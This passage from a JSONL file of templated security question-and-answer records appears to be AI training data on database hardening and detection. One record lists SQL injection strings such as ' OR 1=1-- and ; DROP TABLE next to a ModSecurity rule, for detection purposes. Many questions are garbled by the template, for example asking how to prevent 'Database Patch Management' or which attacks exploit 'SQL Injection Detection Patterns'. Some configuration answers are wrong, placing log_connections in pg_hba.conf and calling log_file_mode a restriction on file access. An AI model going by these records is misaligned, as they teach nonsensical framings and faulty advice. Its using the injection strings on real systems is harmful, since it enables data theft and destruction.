Unencrypted backups on shared storage are common vulnerabilities.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185485Z", "updated_at": "2025-12-17T19:35:42.185485Z"} +{"id": "trtp-5c62a4e66f75", "instruction": "What does Database Backup Security look like in SQL?", "output": "Example of Database Backup Security:\n\n```sql\n# Encrypted PostgreSQL backup:\npg_dump -Fc production | openssl enc -aes-256-cbc -salt -out backup.dump.enc\n\n# SQL Server encrypted backup:\nBACKUP DATABASE production TO DISK = 'backup.bak'\nWITH ENCRYPTION (ALGORITHM = AES_256, SERVER CERTIFICATE = BackupCert);\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-backup-security", "license": "original", "retrieved_at": "2025-12-17T19:35:42.185374Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.185496Z", "updated_at": "2025-12-17T19:35:42.185496Z"} +{"id": "trtp-bccc2bb85932", "instruction": "What do security professionals need to know about Database Patch Management?", "output": "Database software vulnerabilities require timely patching. Patch management balances security urgency with stability requirements. Critical security patches should be expedited while following change management.\n\nSecurity Relevance: Unpatched databases are vulnerable to known exploits. Public CVEs have readily available exploit code. 
Delayed patching provides attackers a window of opportunity.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187236Z", "updated_at": "2025-12-17T19:35:42.187236Z"} +{"id": "trtp-13e4df43869b", "instruction": "Describe the technical aspects of Database Patch Management.", "output": "Database Patch Management consists of the following key components:\n\n- Vulnerability tracking\n- Patch testing procedures\n- Change management integration\n- Downtime planning\n- Rollback procedures", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187255Z", "updated_at": "2025-12-17T19:35:42.187255Z"} +{"id": "trtp-b181be008526", "instruction": "Why is Database Patch Management important for database security?", "output": "Unpatched databases are vulnerable to known exploits. Public CVEs have readily available exploit code. 
Delayed patching provides attackers a window of opportunity.\n\nCommon attack vectors include:\n- Exploiting known CVEs\n- Zero-day attacks (before patches)\n- Supply chain attacks via updates\n- Rollback attacks to vulnerable versions", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187270Z", "updated_at": "2025-12-17T19:35:42.187270Z"} +{"id": "trtp-0cdb5d390d33", "instruction": "What are common attack techniques involving Database Patch Management?", "output": "Attack techniques involving Database Patch Management:\n\n- Exploiting known CVEs\n- Zero-day attacks (before patches)\n- Supply chain attacks via updates\n- Rollback attacks to vulnerable versions\n\nDefenders can detect these attacks by:\n- Version monitoring\n- Vulnerability scanning\n- CVE tracking", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187284Z", "updated_at": "2025-12-17T19:35:42.187284Z"} +{"id": "trtp-cc9cd37f84c4", "instruction": "What indicators reveal malicious activity involving Database Patch Management?", "output": "Methods for detecting Database Patch Management attacks or anomalies:\n\n- Version monitoring\n- Vulnerability scanning\n- CVE tracking\n- Patch compliance reporting", 
"category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187295Z", "updated_at": "2025-12-17T19:35:42.187295Z"} +{"id": "trtp-d4d4ed9dc7e0", "instruction": "What are best practices for preventing Database Patch Management?", "output": "Security controls and preventive measures for Database Patch Management:\n\n- Subscribe to security advisories\n- Test patches promptly\n- Expedite critical security patches\n- Maintain patch compliance metrics\n- Regular vulnerability assessments\n\nUnpatched databases are vulnerable to known exploits. Public CVEs have readily available exploit code. Delayed patching provides attackers a window of opportunity.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187308Z", "updated_at": "2025-12-17T19:35:42.187308Z"} +{"id": "trtp-8251260be13a", "instruction": "What does Database Patch Management look like in SQL?", "output": "Example of Database Patch Management:\n\n```sql\n# Check PostgreSQL version:\nSELECT version();\n\n# Check SQL Server version:\nSELECT @@VERSION;\n\n# Example CVE check:\n# CVE-2019-9193: PostgreSQL arbitrary code execution\n# Fixed in: 9.4.22, 9.5.17, 9.6.13, 10.8, 11.3\n```", "category": "database_security", "team": "foundation", "phase": "3c", 
"provenance": {"source_type": "documentation", "source_id": "database-security-hardening-database-patch-management", "license": "original", "retrieved_at": "2025-12-17T19:35:42.187206Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.187319Z", "updated_at": "2025-12-17T19:35:42.187319Z"} +{"id": "trtp-b021c5d3f641", "instruction": "What is Disabling Dangerous Database Features and why is it important for database security?", "output": "Database systems include features that, while useful, create security risks when exploited. Disabling or restricting dangerous features reduces attack surface. Features like xp_cmdshell, UTL_FILE, and external languages should be controlled.\n\nSecurity Relevance: Dangerous features provide attack paths from SQL injection to system compromise. Disabling unused features eliminates these paths. When features are required, restrict access to minimal accounts.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189072Z", "updated_at": "2025-12-17T19:35:42.189072Z"} +{"id": "trtp-49b26499ecb5", "instruction": "What are the main parts of Disabling Dangerous Database Features that security teams should understand?", "output": "Disabling Dangerous Database Features consists of the following key components:\n\n- Command execution features\n- File system access\n- Network access functions\n- External language integration\n- Administrative extended procedures", "category": 
"database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189093Z", "updated_at": "2025-12-17T19:35:42.189093Z"} +{"id": "trtp-98dab4bcccf2", "instruction": "How can Disabling Dangerous Database Features lead to database security incidents?", "output": "Dangerous features provide attack paths from SQL injection to system compromise. Disabling unused features eliminates these paths. When features are required, restrict access to minimal accounts.\n\nCommon attack vectors include:\n- xp_cmdshell command execution\n- File read/write through SQL\n- Network operations via database\n- UDF-based code execution", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189107Z", "updated_at": "2025-12-17T19:35:42.189107Z"} +{"id": "trtp-51a4dc69259c", "instruction": "What attacks exploit Disabling Dangerous Database Features?", "output": "Attack techniques involving Disabling Dangerous Database Features:\n\n- xp_cmdshell command execution\n- File read/write through SQL\n- Network operations via database\n- UDF-based code execution\n\nDefenders can detect these attacks by:\n- Dangerous feature usage monitoring\n- Configuration change detection\n- Feature enablement 
alerts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189121Z", "updated_at": "2025-12-17T19:35:42.189121Z"} +{"id": "trtp-1f95addc6a02", "instruction": "How can security teams detect attacks related to Disabling Dangerous Database Features?", "output": "Methods for detecting Disabling Dangerous Database Features attacks or anomalies:\n\n- Dangerous feature usage monitoring\n- Configuration change detection\n- Feature enablement alerts\n- Privilege grants for dangerous features", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189134Z", "updated_at": "2025-12-17T19:35:42.189134Z"} +{"id": "trtp-c124c160e6cc", "instruction": "What are best practices for preventing Disabling Dangerous Database Features?", "output": "Security controls and preventive measures for Disabling Dangerous Database Features:\n\n- Disable xp_cmdshell, UTL_FILE, etc.\n- Restrict secure_file_priv\n- Disable CLR/Java unless required\n- Regular feature audit\n- Minimal privilege for required features\n\nDangerous features provide attack paths from SQL injection to system compromise. Disabling unused features eliminates these paths. 
When features are required, restrict access to minimal accounts.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189146Z", "updated_at": "2025-12-17T19:35:42.189146Z"} +{"id": "trtp-6d8624ae6d7b", "instruction": "What is the syntax for Disabling Dangerous Database Features?", "output": "Example of Disabling Dangerous Database Features:\n\n```sql\n-- SQL Server: disable xp_cmdshell\nEXEC sp_configure 'xp_cmdshell', 0;\nRECONFIGURE;\n\n-- PostgreSQL: restrict file access\nALTER SYSTEM SET log_file_mode = '0600';\n\n-- MySQL: disable dangerous functions\n-- In my.cnf:\n[mysqld]\nlocal-infile=0\nsecure-file-priv=/restricted/path\n```", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-hardening-disabling-dangerous-database-features", "license": "original", "retrieved_at": "2025-12-17T19:35:42.189042Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.189157Z", "updated_at": "2025-12-17T19:35:42.189157Z"} +{"id": "trtp-082ee97ba9ff", "instruction": "Describe SQL Injection Detection Patterns and its role in database security.", "output": "SQL injection attacks exhibit recognizable patterns in logs and traffic. Detection involves identifying SQL keywords, special characters, and attack signatures in user input and query logs.\n\nSecurity Relevance: Early SQL injection detection prevents data breaches. 
Real-time detection enables blocking and alerting. Post-incident detection reveals compromise scope and attacker techniques.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190911Z", "updated_at": "2025-12-17T19:35:42.190911Z"} +{"id": "trtp-e826ea63e2fa", "instruction": "What are the key components of SQL Injection Detection Patterns?", "output": "SQL Injection Detection Patterns consists of the following key components:\n\n- SQL keyword detection (UNION, SELECT, etc.)\n- Special character patterns (', \", --, ;)\n- Error message indicators\n- Query anomaly detection\n- WAF and IDS signatures", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190931Z", "updated_at": "2025-12-17T19:35:42.190931Z"} +{"id": "trtp-680f391308f3", "instruction": "From a security perspective, why should defenders understand SQL Injection Detection Patterns?", "output": "Early SQL injection detection prevents data breaches. Real-time detection enables blocking and alerting. 
Post-incident detection reveals compromise scope and attacker techniques.\n\nCommon attack vectors include:\n- Parameter manipulation with SQL syntax\n- Error-based extraction attempts\n- Blind injection probing\n- Automated tool patterns (sqlmap)", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190945Z", "updated_at": "2025-12-17T19:35:42.190945Z"} +{"id": "trtp-460c15762bee", "instruction": "What attacks exploit SQL Injection Detection Patterns?", "output": "Attack techniques involving SQL Injection Detection Patterns:\n\n- Parameter manipulation with SQL syntax\n- Error-based extraction attempts\n- Blind injection probing\n- Automated tool patterns (sqlmap)\n\nDefenders can detect these attacks by:\n- SQL keywords in request parameters\n- Database error messages in responses\n- Sequential true/false condition testing", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190959Z", "updated_at": "2025-12-17T19:35:42.190959Z"} +{"id": "trtp-aa106e4b5385", "instruction": "How do you detect exploitation of SQL Injection Detection Patterns?", "output": "Methods for detecting SQL Injection Detection Patterns attacks or anomalies:\n\n- SQL keywords in request 
parameters\n- Database error messages in responses\n- Sequential true/false condition testing\n- Time-based delay patterns\n- Unusual query execution times", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190970Z", "updated_at": "2025-12-17T19:35:42.190970Z"} +{"id": "trtp-b224df6328f3", "instruction": "What preventive measures address SQL Injection Detection Patterns vulnerabilities?", "output": "Security controls and preventive measures for SQL Injection Detection Patterns:\n\n- WAF rules for SQL injection\n- Input validation logging\n- Database query monitoring\n- Anomaly-based detection\n- Response monitoring for errors\n\nEarly SQL injection detection prevents data breaches. Real-time detection enables blocking and alerting. 
Post-incident detection reveals compromise scope and attacker techniques.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190982Z", "updated_at": "2025-12-17T19:35:42.190982Z"} +{"id": "trtp-117e8e9342a7", "instruction": "Provide a code example for SQL Injection Detection Patterns.", "output": "Example of SQL Injection Detection Patterns:\n\n```sql\n-- Log patterns indicating SQL injection:\n-- Single quotes in input: ' OR 1=1--\n-- UNION attempts: UNION SELECT NULL,NULL\n-- Comment injection: admin'--\n-- Stacked queries: ; DROP TABLE\n\n-- WAF rule example (ModSecurity):\nSecRule ARGS \"(?i)(union.*select|select.*from|insert.*into)\" \"id:1000,deny,msg:'SQL Injection'\"\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-sql-injection-detection-patterns", "license": "original", "retrieved_at": "2025-12-17T19:35:42.190882Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.190993Z", "updated_at": "2025-12-17T19:35:42.190993Z"} +{"id": "trtp-47a3beadd425", "instruction": "What do security professionals need to know about Database Query Anomaly Detection?", "output": "Query anomaly detection identifies unusual database activity by comparing against baseline patterns. 
Anomalies include unusual tables accessed, query volume spikes, new query patterns, and time-of-day variations.\n\nSecurity Relevance: Anomaly detection catches attacks that bypass signature-based detection. It identifies compromised credentials, insider threats, and novel attack techniques. Baselines must be maintained.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192862Z", "updated_at": "2025-12-17T19:35:42.192862Z"} +{"id": "trtp-703b627f754f", "instruction": "Describe the technical aspects of Database Query Anomaly Detection.", "output": "Database Query Anomaly Detection consists of the following key components:\n\n- Query baseline establishment\n- Statistical anomaly detection\n- Machine learning models\n- Query pattern analysis\n- User behavior analytics", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192883Z", "updated_at": "2025-12-17T19:35:42.192883Z"} +{"id": "trtp-f9a2366d1293", "instruction": "How can Database Query Anomaly Detection lead to database security incidents?", "output": "Anomaly detection catches attacks that bypass signature-based detection. It identifies compromised credentials, insider threats, and novel attack techniques. 
Baselines must be maintained.\n\nCommon attack vectors include:\n- Data exfiltration through normal queries\n- Credential abuse\n- Insider data theft\n- Low-and-slow extraction", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192897Z", "updated_at": "2025-12-17T19:35:42.192897Z"} +{"id": "trtp-0a889a311cc2", "instruction": "What are common attack techniques involving Database Query Anomaly Detection?", "output": "Attack techniques involving Database Query Anomaly Detection:\n\n- Data exfiltration through normal queries\n- Credential abuse\n- Insider data theft\n- Low-and-slow extraction\n\nDefenders can detect these attacks by:\n- Query volume spikes\n- New tables or columns accessed\n- Unusual query times", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192911Z", "updated_at": "2025-12-17T19:35:42.192911Z"} +{"id": "trtp-a3e3909fba68", "instruction": "What log entries indicate Database Query Anomaly Detection attacks?", "output": "Methods for detecting Database Query Anomaly Detection attacks or anomalies:\n\n- Query volume spikes\n- New tables or columns accessed\n- Unusual query times\n- Behavioral baseline deviation\n- Cross-database access patterns", 
"category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192923Z", "updated_at": "2025-12-17T19:35:42.192923Z"} +{"id": "trtp-72715f5da9e3", "instruction": "What are best practices for preventing Database Query Anomaly Detection?", "output": "Security controls and preventive measures for Database Query Anomaly Detection:\n\n- Establish query baselines\n- Monitor for deviations\n- Alert on anomalies\n- Regular baseline updates\n- User behavior profiling\n\nAnomaly detection catches attacks that bypass signature-based detection. It identifies compromised credentials, insider threats, and novel attack techniques. 
Baselines must be maintained.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192935Z", "updated_at": "2025-12-17T19:35:42.192935Z"} +{"id": "trtp-673f78c237a5", "instruction": "What does Database Query Anomaly Detection look like in SQL?", "output": "Example of Database Query Anomaly Detection:\n\n```sql\n-- PostgreSQL query logging for analysis:\n-- postgresql.conf:\nlog_statement = 'all'\nlog_duration = on\nlog_line_prefix = '%t [%p]: user=%u,db=%d,app=%a '\n\n-- Analysis queries:\n-- Unusual table access\nSELECT usename, query FROM pg_stat_activity\nWHERE query LIKE '%information_schema%';\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-query-anomaly-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.192833Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.192945Z", "updated_at": "2025-12-17T19:35:42.192945Z"} +{"id": "trtp-abdd15eef82d", "instruction": "Describe Database Authentication Monitoring and its role in database security.", "output": "Authentication monitoring detects credential attacks, unauthorized access attempts, and compromised accounts. Key indicators include failed logins, unusual login times, and connections from unexpected sources.\n\nSecurity Relevance: Authentication attacks are often the first stage of database compromise. 
Monitoring detects brute force, credential stuffing, and unauthorized access. Rapid detection prevents data theft.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194713Z", "updated_at": "2025-12-17T19:35:42.194713Z"} +{"id": "trtp-26b06b345213", "instruction": "What elements make up Database Authentication Monitoring?", "output": "Database Authentication Monitoring consists of the following key components:\n\n- Failed login tracking\n- Source IP analysis\n- Time-of-day patterns\n- Account lockout monitoring\n- New account creation", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194732Z", "updated_at": "2025-12-17T19:35:42.194732Z"} +{"id": "trtp-10f760ab33ad", "instruction": "How can Database Authentication Monitoring lead to database security incidents?", "output": "Authentication attacks are often the first stage of database compromise. Monitoring detects brute force, credential stuffing, and unauthorized access. 
Rapid detection prevents data theft.\n\nCommon attack vectors include:\n- Brute force password attacks\n- Credential stuffing\n- Account enumeration\n- Password spraying", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194748Z", "updated_at": "2025-12-17T19:35:42.194748Z"} +{"id": "trtp-50434ea0aa87", "instruction": "What are common attack techniques involving Database Authentication Monitoring?", "output": "Attack techniques involving Database Authentication Monitoring:\n\n- Brute force password attacks\n- Credential stuffing\n- Account enumeration\n- Password spraying\n\nDefenders can detect these attacks by:\n- Multiple failed login attempts\n- Logins from unusual IPs\n- Off-hours authentication", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194761Z", "updated_at": "2025-12-17T19:35:42.194761Z"} +{"id": "trtp-d4fdebffa9eb", "instruction": "What should analysts look for when monitoring for Database Authentication Monitoring?", "output": "Methods for detecting Database Authentication Monitoring attacks or anomalies:\n\n- Multiple failed login attempts\n- Logins from unusual IPs\n- Off-hours authentication\n- Service account misuse\n- Concurrent 
logins from multiple locations", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194773Z", "updated_at": "2025-12-17T19:35:42.194773Z"} +{"id": "trtp-0a092a6021dc", "instruction": "What are best practices for preventing Database Authentication Monitoring?", "output": "Security controls and preventive measures for Database Authentication Monitoring:\n\n- Enable authentication logging\n- Alert on failed login thresholds\n- Monitor for unusual patterns\n- Implement account lockout\n- Use SIEM for correlation\n\nAuthentication attacks are often the first stage of database compromise. Monitoring detects brute force, credential stuffing, and unauthorized access. 
Rapid detection prevents data theft.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194785Z", "updated_at": "2025-12-17T19:35:42.194785Z"} +{"id": "trtp-8beeab7ee355", "instruction": "What does Database Authentication Monitoring look like in SQL?", "output": "Example of Database Authentication Monitoring:\n\n```sql\n-- PostgreSQL: failed authentication logging\n-- pg_hba.conf: log all authentication\nlog_connections = on\nlog_disconnections = on\n\n-- SQL Server: login auditing\nCREATE SERVER AUDIT LoginAudit\nTO FILE (FILEPATH = 'C:\\\\Audit\\\\');\nCREATE SERVER AUDIT SPECIFICATION LoginAuditSpec\nFOR SERVER AUDIT LoginAudit\nADD (FAILED_LOGIN_GROUP);\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-authentication-monitoring", "license": "original", "retrieved_at": "2025-12-17T19:35:42.194683Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.194795Z", "updated_at": "2025-12-17T19:35:42.194795Z"} +{"id": "trtp-154ed3285124", "instruction": "Explain Privilege Escalation Detection from a security perspective.", "output": "Privilege escalation detection identifies attempts to gain higher database permissions than authorized. 
This includes GRANT statement monitoring, role changes, and exploitation of security vulnerabilities.\n\nSecurity Relevance: Privilege escalation transforms limited access into full database control. Detecting escalation attempts reveals active attacks and compromised accounts. Prevention limits breach impact.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.196579Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196614Z", "updated_at": "2025-12-17T19:35:42.196614Z"} +{"id": "trtp-42805968eed0", "instruction": "Describe the technical aspects of Privilege Escalation Detection.", "output": "Privilege Escalation Detection consists of the following key components:\n\n- GRANT statement monitoring\n- Role membership changes\n- Privilege usage auditing\n- SECURITY DEFINER exploitation\n- System privilege abuse", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": 